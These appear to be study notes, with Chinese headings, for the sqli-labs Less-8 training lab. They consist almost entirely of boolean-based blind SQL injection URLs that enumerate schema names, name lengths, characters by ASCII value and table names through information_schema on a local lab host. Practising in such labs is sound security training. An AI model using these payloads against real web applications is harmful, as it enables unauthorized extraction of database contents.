# 库名 http://192.168.100.52/sqli-labs/Less-8/?id=1' and select group_concat(schema_name) from information_schema.schemata --+
1 2
# 库名长度 http://192.168.100.52/sqli-labs/Less-8/?id=1' and length((select group_concat(schema_name) from information_schema.schemata)) > 50 --+
1 2
# 判断各个字符 ASCII http://192.168.100.52/sqli-labs/Less-8/?id=1' and ascii(mid((select group_concat(schema_name) from information_schema.schemata), 1, 1)) > 50 --+
1
http://192.168.100.52/sqli-labs/Less-8/?id=1'and (select count(distinct schema_name) from information_schema.schemata) > 3 ——+
1
http://192.168.100.52/sqli-labs/Less-8/?id=1' and mid((select distinct schema_name from information_schema.schemata limit 0,1), 1, 1) > 50 --+
1 2
# 查看当前数据中有几张表 http://192.168.100.52/sqli-labs/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema = database()) > 1 --+
1 2
# 查看一张表的名字 http://192.168.100.52/sqli-labs/Less-8/?id=1' and length((select table_name from information_schema.tables where table_schema = database() limit 0,1)) > 1 --+
1
http://192.168.100.52/sqli-labs/Less-8/?id=1' and ascii(mid((select table_name from information_schema.tables where table_schema = database() limit 0,1), 1, 1)) > 100 --+